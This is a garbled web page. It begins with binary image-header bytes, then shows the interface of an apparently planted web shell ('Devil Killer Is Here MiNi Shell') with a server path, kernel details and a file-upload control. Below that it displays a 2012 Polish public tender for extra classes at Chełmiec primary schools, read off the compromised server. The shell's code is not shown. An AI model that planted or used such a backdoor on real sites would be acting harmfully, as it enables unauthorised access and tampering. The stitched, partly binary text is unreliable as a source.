JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121114/449130-N-2012.html

<p class="kh_header"><b>Chełmiec: Świadczenie usług edukacyjnych polegających na organizacji i przeprowadzeniu dodatkowych zajęć edukacyjnych dla uczniów w klasach I-III szkół podst. na terenie Gminy Chełmiec w ramach realizacji projektu ABC nauki-wyrównywanie szans edukacyjno-rozwojowych dzieci klas I-III szkół podst. Gminy Chełmiec finansowanego przez UE w ramach POKL-Dz.9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług eduk. świadczonych w systemie oświaty, Poddz.9.1.2 Wyrównywanie szans eduk. uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych</b><br>
<b>Numer ogłoszenia: 449130 - 2012; data zamieszczenia: 14.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Ekonomiczno-Administracyjnej Szkół , ul. Papieska 2, 33-395 Chełmiec, woj. małopolskie, tel. 018 4145610, faks 018 4145643.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chelmiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług edukacyjnych polegających na organizacji i przeprowadzeniu dodatkowych zajęć edukacyjnych dla uczniów w klasach I-III szkół podst. na terenie Gminy Chełmiec w ramach realizacji projektu ABC nauki-wyrównywanie szans edukacyjno-rozwojowych dzieci klas I-III szkół podst. Gminy Chełmiec finansowanego przez UE w ramach POKL-Dz.9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług eduk. świadczonych w systemie oświaty, Poddz.9.1.2 Wyrównywanie szans eduk. uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług edukacyjnych polegających na organizacji i przeprowadzeniu dodatkowych zajęć edukacyjnych dla uczniów w klasach I - III szkół podstawowych na terenie Gminy Chełmiec w ramach realizacji projektu ABC nauki - wyrównywanie szans edukacyjno-rozwojowych dzieci klas I-III szkół podstawowych Gminy Chełmiec finansowanego przez Unię Europejską w ramach Programu Operacyjnego Kapitał Ludzki - Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
2. Zajęcia prowadzone będą w następujących szkołach podstawowych:
1. Zespół Szkół w Wielogłowach, 33-311 Wielogłowy 56
2. Zespół Szkół w Chomranicach, 33-394 Klęczany
3. Szkoła Podstawowa w Marcinkowicach, 33-393 Marcinkowice 132
4. Szkoła Podstawowa w Krasnem Potockim, Krasne Potockie 118
5. Szkoła Podstawowa w Rdziostowie, 33-393 Marcinkowice
6. Zespół Szkół w Chełmcu, ul. Marcinkowicka 9, 33-395 Chełmiec
7. Zespół Szkół w Librantowej, 33-300 Nowy Sącz
8. Zespół Szkół w Paszynie, 33-326 Mogilno
9. Szkoła Podstawowa w Biczycach Dolnych, 33-395 Chełmiec
10. Szkoła Podstawowa w Boguszowej, 33-310 Nowy Sącz
11. Zespół Szkół w Piątkowej, 33-300 Nowy Sącz
12. Szkoła Podstawowa w Niskowej, 33-395 Chełmiec
13. Szkoła Podstawowa w Klęczanach, 33-394 Klęczany 1a 
14. Zespół Szkół w Trzetrzewinie, 33-395 Chełmiec
15. Szkoła Podstawowa w Januszowej, 33-300 Nowy Sącz
16. Zespół Szkół w Śiwniarsku, 33-395 Chełmiec, Świniarsko 132

3. Zajęcia realizowane będą w roku szkolnym 2012/2013, przed lub po godzinach lekcyjnych, w następującym zakresie:
Nazwa zadania: Szczegółowy opis zadania i produktów, które będą wytworzone w ramach jego realizacji. Produkt - Zakup usługi edukacyjnej
1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
SP Biczyce Dolne - zaj. dla10 ucz. (4K i 6M) 2gr/5os/40h 
SP Boguszowa- zaj. dla 8 ucz. (2K i 6M) 1gr/8os/40h 
SP Januszowa- zaj.  20 ucz. (7K i 13M) 2gr/11/9os/40h
SP Klęczany- zaj. dla 18 ucz. (8K i 10M) 3gr/6os/40h
SP Krasne Pot. - zaj. dla 24 ucz. (13K i 11M) 3gr/8os/40h 
SP Marcinkowice- zaj. dla 8 ucz. (4K i 4M) 1gr/8os/40h
SP Niskowa- zaj. dla  3 ucz. (1 K i 2 M) 1 gr/3os/40h 
SP Rdziostów- zaj. dla 24 ucz. (8K i 16M) 3gr/8os/40h
SP Chełmiec- zaj. dla 36 ucz. (14K i 22M) 5gr/7os/40h
SP Chomranice- zaj. dla 21 ucz. (8K i 13M) 3gr/7os/40h
SP Librantowa- zaj. dla 16 ucz. (5K i 11M) 2gr/8os/40h
SP Paszyn- zaj. dla 32 ucz. (16K i 16M) 4gr/8os/40h
SP Piątkowa- zaj. dla 14 ucz. (5K i 9M) 2gr/7/8os/40h
SP Świniarsko- zaj. dla 28 ucz. (21K i 7M) 4gr/7os/40h
SP Trzetrzewina- zaj. dla 20 ucz. (7K i 13M) 3gr/6/7os/40h
SP Wielogłowy- zaj. dla 15 ucz. (6K i 9M) 2gr/7/8os/40h

2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych:
SP Boguszowa- zaj. dla 8 ucz. (4K i 4M) 1gr/8os/40h 
SP Januszowa- zaj. dla 11 ucz. (2K i 9M) 1gr/11os/40h 
SP Klęczany- zaj. dla 22 ucz. (11K i 11M) 3gr/7/8os/40h 
SP Krasne Pot. - zaj. dla 24 ucz. (15K i 9M) 3gr/8os/40h 
SP Marcinkowice- zaj. dla 8 ucz. (5K i 3M) 1gr/8os/40h 
SP Niskowa- zaj. dla 7 ucz. (3K i 4M) 1gr/7os/40h
SP Rdziostów- zaj. dla 8 ucz. (5K i 3M) 1gr/8os/40h 
SP Chełmiec- zaj. dla 32 ucz. (14K i 18M) 4gr/8os/40h 
SP Chomranice- zaj. dla 22 ucz. (12K i 10M) 3gr/7/8os/40h 
SP Paszyn- zaj. dla 32 ucz. (16K i 16M) 4gr/8os/40h
SP Piątkowa- zaj. dla 11 ucz. (5K i 6M) 2gr/6/5os/40h
SP Świniarsko- zaj. dla 24 ucz. (13K i 11M) 3gr/8os/40h
SP Trzetrzewina- zaj. dla 30 ucz. (11K i 19M) 4gr/7/8os/40h 
SP Wielogłowy- zaj. dla 10 ucz. (5K i 5M) 2gr/5os/40h

3. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy:
SP Biczyce D. - zaj. dla 11 ucz. (6K i 5M) 3gr/3/4os/40h
SP Boguszowa- zaj. dla 4 ucz. (4M i 0K) 1gr/4os/40h 
SP Klęczany- zaj. dla 4 ucz. (2K i 2M) 1gr/4os/40h 
SP Marcinkowice- zaj. dla 12 ucz. (6K i 6M) 3gr/4os/40h 
SP Niskowa- zaj. dla 5 ucz. (1K i 4M) 2gr/2/3os/40h 
SP Chełmiec- zaj. dla 28 ucz. (14K i 14M) 7gr/4os/40h 
SP Chomranice- zaj. dla 9 ucz. (6K i 3M) 3gr/3os/40h 
SP Paszyn- zaj. dla 16 ucz. (6K i 10M) 4gr/4os/40h 
SP Piątkowa- zaj. dla 16 ucz. (4K i 12M) 4gr/4os/40h 
SP Trzetrzewina- zaj. dla 23 ucz. (6K i 17M) 6gr/3/4os/40h 
SP Wielogłowy- zaj. dla 8 ucz. (4K i 4M) 2gr/4os/40h 
SP Librantowa - zaj. dla 16 ucz. (8K i 8M) 2 gr/8os/40h

4. Zajęcia specjalistyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej:
SP Marcinkowice- zaj. dla 8 ucz. (4K i 4M) 1gr/8os/40h
SP Chełmiec- zaj. dla 35 ucz. (14K i 21M) 5gr/7os/40h
SP Piątkowa- zaj. dla 14 ucz. (5K i 9M) 2gr/7os/40h 
SP Wielogłowy- zaj. dla 15 ucz. (6K i 9M) 2gr/7/8os/40h 

5. Gimnastyka korekcyjna dla dzieci z wadami postawy:
SP Biczyce D. - zaj. dla 32 ucz. (16K i 16M) 3gr/10/11os/40h
SP Boguszowa- zaj. dla 10 ucz. (4K i 6M) 1gr/10os/40h
SP Januszowa- zaj. dla 25ucz. (10K i 15M) 2gr/14/11os/40h
SP Klęczany- zaj. dla 9 ucz. (4K i 5M) 1gr/9os/40h
SP Krasne Pot. - zaj. dla 24 ucz. (12K i 12M) 2gr/12os/40h 
SP Marcinkowice- zaj. dla 12 ucz. (6K i 6M) 1gr/12os/40h
SP Niskowa- zaj. dla 9 ucz. (7K i 2M) 1gr/9os/40h 
SP Rdziostów- zaj. dla 24 ucz. (12K i 12M) 2gr/12os/40h
SP Chełmiec- zaj. dla 53 ucz. (27K i 26M) 5gr/10/11os/40h
SP Chomranice- zaj. dla 23 ucz. (14K i 9M) 3gr/7/8os/40h 
SP Paszyn- zaj. dla 36 ucz. (16K i 20M) 3gr/12os/40h
SP Piątkowa- zaj. dla 20 ucz. (11K i 9M) 2gr/8/12os/40h
SP Świniarsko- zaj. dla 36 ucz. (23K i 13M) 3gr/12os/40h 
SP Trzetrzewina- zaj. dla 33 ucz. (15K i 18M) 4gr/8/9os/40h
SP Librantowa - zaj. dla 12 ucz. (5K i 7M) 1 gr/12os/40h

6. Specjalistyczne zajęcia socjoterapeutyczne:
SP Marcinkowice- zaj. dla 10 ucz. (K0 i 10M) 2gr/5os/40h 
SP Piątkowa- zaj. dla 4 ucz. (2K i 2M) 1gr/4os/40h 

7. Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych za szczególnym uwzględnieniem nauk matematyczno - przyrodniczych oraz matematyka, informatyka, język angielski, plastyczne, muzyczne, taneczne, literackie, ekologia, mały naukowiec:
SP Januszowa- zaj. dla 22 ucz. (12K i 10M) 2gr/11os/40h
1. SP Januszowa - 1 gr. zaj. matematyczne, 11os/40h 
2. SP Januszowa -1 gr. zaj. informatyczne, 11 os/40 
Zbiorczo SP Klęczany- zaj. dla 46 ucz. (29K i 17M) 6gr/7/8os/40h 
1. SP Klęczany - 1 gr. zaj. muzyczne, 8 os/40h 
2. SP Klęczany - 1 gr. zaj. plastyczne, 7 os/40h 
3. SP Klęczany - 2 gr. zaj. j. angielski , 7/8 os/40h
4. SP Klęczany - 1 gr. zaj. ekologiczno-turystyczne, 8 os/40h 
5. SP Klęczany - 1 gr. zaj. informatyczne, 8 os/40h
Zbiorczo SP Krasne Pot. - zaj. dla 12 ucz.(7K i 5M) 1gr/12os/40h 
       1. SP Krasne Potockie - 1 gr. zaj. muzyczne, 12 os/40h
Zbiorczo SP Marcinkowice- zaj. dla 27 ucz. (15K i 12M) 4gr/6/7os/40h
1. SP Marcinkowice - 2 gr. zaj. j. angielski, 6/7 os/40h 
2. SP Marcinkowice - 1 gr. zaj. młody naukowiec, 7 os/40h
3. SP Marcinkowice - 2 gr. zaj. matematyczne 8 os/40h
Zbiorczo SP Niskowa- zaj. dla 3 ucz. (2K i 1M) 1gr/3os/40h 
1. SP Niskowa - 1 gr. zaj. matematyczne 3 os/40h
Zbiorczo SP Rdziostów- zaj. dla 14 ucz. (4K i 10M) 2gr/8/6 os/40h 
1. SP Rdziostów - 1 gr. zaj. j. angielskiego, 8 os/40 
2. SP Rdziostów - 1 gr. zaj. plastyczne 8 os/40 
Zbiorczo SP Chełmiec - zaj. dla 35 ucz. (14K i 21M) 5gr/7os/40h
1. SP Chełmiec - 1 gr. zaj. plastyczne, 7 os/40 h 
2. SP Chełmiec - 1 gr. zaj. taneczno-muzyczne, 7 os/40 h 
3. SP Chełmiec - 1 gr. zaj. informatyczne, 7 os/40 h 
4. SP Chełmiec - 1 gr. zaj. matematyczno-przyrodnicze, 7os/40 h
5. SP Chełmiec - 1 gr. zaj. naukowiec, 7 os/40 h 
Zbiorczo SP Chomranice - zaj. dla 63 ucz. (32K i 31M) 9gr/7os/40h
1. SP Chomranice - 2 gr. zaj. plastyczne, 7 os/40 h 
2. SP Chomranice - 1 gr. zaj. muzyczno-taneczne, 7 os/40 h 
3. SP Chomranice - 1 gr. zaj. informatyczne, 7 os/40 h
4. SP Chomranice - 1 gr. zaj. filmowe, 7 os/40 h
5. SP Chomranice - 1 gr. zaj. matematyczne, 7 os/40 h 
6. SP Chomranice - 2 gr. zaj. ortograficzne, 7 os/40 h
7. SP Chomranice - 1 gr. zaj. mały naukowiec, 7 os/40 h 
Zbiorczo SP Librantowa- zaj. dla 16 ucz. (5K i 11M) 2gr/8os/40h 
 1.  SP Librantowa - 2 gr. zaj. przyrodnicze, 8 os/40 h
Zbiorcze  SP Paszyn- zaj. dla 32 ucz. (20K i 12M) 4gr/8os/40h
1. SP Paszyn- 3 gr. zaj. j. angielskiego, 8 os/40 
2. SP Paszyn- 1 gr. zaj. komputerowe, 8 os/40
Zbiorczo SP Piątkowa- zaj. dla 22 ucz. (15K i 7M) 3gr/7/8os/40h
1. SP Piątkowa - 2 gr. zaj. plastyczne, 7/8 os/40 h 
2. SP Piątkowa - 1 gr. zaj. ekologiczne, 7 os/40 h 
Zbiorczo SP Świniarsko- zaj. dla 80 ucz. (61K i 19M) 10gr/8os/40h
1. SP Świniarsko - 2 gr. zaj. taneczno-ruchowe, 8 os/40 h 
2. SP Świniarsko - 1 gr. zaj. przyrodnicze, 8 os/40 h 
3. SP Świniarsko -  3 gr. zaj. plastyczne, 8 os/40 h 
4. SP Świniarsko - 1 gr. zaj. muzyczne, 8 os/40 h 
5. SP Świniarsko - 1 gr. zaj. informatyczne, 8 os/40 h 
6. SP Świniarsko - 1 gr. zaj. literackie, 8 os/40 h 
7. SP Świniarsko - 1 gr. zaj. j. angielski, 8 os/40 h 
1. Zbiorczo SP Trzetrzewina- zaj. dla 31 ucz. (21K i 10M) 4gr/7/8os/40hSP Trzetrzewina - 1 gr. zaj. matematyczne, 8 os/40 h SP Trzetrzewina - 2 gr. zaj. plastyczne, 8 os/40 h SP Trzetrzewina - 1 gr. zaj. redakcyjne, 7 os/40 h 
Zbiorczo SP Wielogłowy- zaj. dla 30 ucz. (18K i 12M) 4gr/7/8os/40h 
1. SP Wielogłowy - 1 gr. zaj. literackie, 8 os/40 h                    
2. SP Wielogłowy - 1 gr. zaj. plastyczne, 8 os/40 h 
3. SP Wielogłowy - 1 gr. zaj. przyrodniczo - ekologiczne, 7 os/40 h 
4. SP Wielogłowy - 1 gr. zaj. matematyczne, 7 os/40 h 

4. Jeden uczestnik projektu (uczeń) może brać udział w więcej niż 1 rodzaju zajęć.
5. Czas trwania jednej godziny zajęć wynosi: godzinę zegarową (60 minut) w przypadku zajęć specjalistycznych, wymienionych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 17 listopada 2010 roku w sprawie zasad organizacji pomocy psychologiczno - pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz.U. Nr 228 poz. 1487 z późn. zm.), godzinę lekcyjną (45 minut) w przypadku zajęć dydaktyczno - wyrównawczych wymienionych w w-w Rozporządzeniu oraz zajęć pozostałych, które nie zostały wskazane w powyższym akcie prawnym. 
6. Zamawiający zapewni bezpłatny dostęp do sal, w których prowadzone będą zajęcia w szkołach biorących udział w projekcie. 
7. Osoby prowadzące poszczególne zajęcia sporządzą testy lub ankiety ewaluacyjne sprawdzające wiedzę, umiejętności, rodzaj wad postawy lub rodzaje zaburzeń mowy (w zależności od rodzaju zajęć) każdego uczestnika na początku, 3 miesiące przed terminem zakończenia zajęć oraz na końcu przeprowadzonych zajęć (tzw. karty ucznia), a następnie Wykonawca dokona analizy danych otrzymanych od prowadzących zajęcia, sporządzi opracowanie zbiorcze według wytycznych przekazanych przez Zamawiającego. Dokument ten Wykonawca przekaże Zamawiającemu w terminie 3 miesięcy przed terminem zakończenia zajęć oraz ostatecznie do 10 lipca 2013 r. (podsumowanie dotyczy badania rezultatów zajęć w roku szkolnym 2012/2013). Wykonawca zapewni jednolitość narzędzi pomiaru wskaźników dla tego samego rodzaju zajęć prowadzonych w poszczególnych szkołach dla roku szkolnego 2012/2013. Karta ucznia i zawarta w nich ocena opisowa mówią o progresie edukacyjnym/rozwojowym lub jego braku. Ważne, by zamawiający miał wiedzę o braku progresu na tyle wcześnie, by mógł podjąć środki zaradcze poprzez modyfikacje harmonogramu zajęć w celu osiągnięcia założonych wskaźników na koniec realizacji projektu.
8. Harmonogram realizacji poszczególnych zajęć Wykonawca opracuje we współpracy z dyrektorami szkół biorących udział w projekcie, uwzględniając podział zajęć dla każdej szkoły oraz plan lekcji beneficjentów ostatecznych. Harmonogram zajęć będzie musiał być dostosowany do harmonogramu wynikającego z wniosku o dofinansowanie oraz z potrzeb Zamawiającego.
9. Wykonawca będzie zobowiązany opracować Regulamin realizacji zajęć dydaktycznych i dostarczyć go Zamawiającemu do akceptacji w terminie do 5 dni od daty podpisania umowy. Regulamin będzie zawierał program szkoleń, harmonogram, o którym mowa w pkt 8 oraz zapisy określające dopuszczalną liczbę nieusprawiedliwionych godzin nieobecności na zajęciach, jak również procedury postępowania w przypadku wycofania się ucznia z udziału w zajęciach (przed rozpoczęciem, bądź w ich trakcie), powtarzającej się nieobecności ucznia na zajęciach, (gdy liczba nieusprawiedliwionych godzin przekracza dopuszczalną ilość), rażącego naruszenia zasad uczestnictwa w zajęciach, skreślenia uczestnika z listy uczniów szkoły objętej wsparciem w ramach projektu, samodzielnej rezygnacji uczestnika podpisanej przez rodzica / prawnego opiekuna. Regulamin będzie ponadto określał procedurę zastępowania ucznia w razie jego rezygnacji bądź skreślenia z listy uczestników projektu, uczniem wskazanym przez dyrektora szkoły spełniającym kryteria uczestnictwa w projekcie.
10. Przed rozpoczęciem zajęć edukacyjnych Wykonawca otrzyma od dyrektorów poszczególnych szkół objętych projektem, listy uczniów zakwalifikowanych do udziału w projekcie (Beneficjentów Ostatecznych), z podziałem na grupy w ramach każdego rodzaju zajęć. Liczba osób w grupie dla poszczególnych rodzajów zajęć będzie zgodna z wytycznymi określonymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia 17 listopada 2010 r. w sprawie zasad udzielania i organizacji pomocy psychologicznej w publicznych przedszkolach, szkołach i placówkach oraz z zapisami wniosku o dofinansowanie projektu.
11. Wykonawca będzie przekazywał następujące dokumenty dotyczące realizacji zajęć:
a) miesięczne sprawozdania z realizacji godzin w poszczególnych grupach zawierające analizę frekwencji uczestników na zajęciach (w terminie do 5 dnia następnego miesiąca),
b) imienny wykaz osób, które brały udział w zajęciach (po skończonym miesiącu w terminie do 5 dnia następnego miesiąca),
c) imienny wykaz osób, które zrezygnowały z udziału w zajęciach bądź zostały skreślone z listy uczestników z określeniem przyczyn takiego stanu rzeczy (po skończonym miesiącu w terminie do 5 dnia następnego miesiąca),
d) dzienniki zajęć z listą obecności (po skończonym miesiącu w terminie do 5 dnia następnego miesiąca),
e) zbiorcze opracowanie wyników badania rezultatów projektu do 10 lipca 2013 r. (podsumowanie dotyczące badania rezultatów zajęć zrealizowanych w roku szkolnym 2012/2013).
12. Wykonawca będzie zobowiązany do prowadzenia zajęć metodami aktywizującymi, z wykorzystaniem zakupionych w ramach projektu pomocy i materiałów dydaktycznych przez Zamawiającego.
13. Wykonawca umożliwi Zamawiającemu wizytowanie w trakcie zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 125.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>rozpatrywane będą oferty, w których wykonawca oświadczy o posiadaniu uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>rozpatrywane będą oferty, w których wykonawca oświadczy o posiadaniu przynajmniej 3 letni staż pracy w zakresie objętym częścią zamówienia do realizacji której przystąpił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Wykonawca powinien w szczególności posiadać (albo dysponować osobami posiadającymi) kwalifikacje/uprawnienia do prowadzenia zajęć wyszczególnionych w wybranej części, tj. posiadać wymagane wykształcenie i kwalifikacje zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenie szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009r. Nr 50, poz. 400)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>rozpatrywane będą oferty, w których wykonawca oświadczy, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
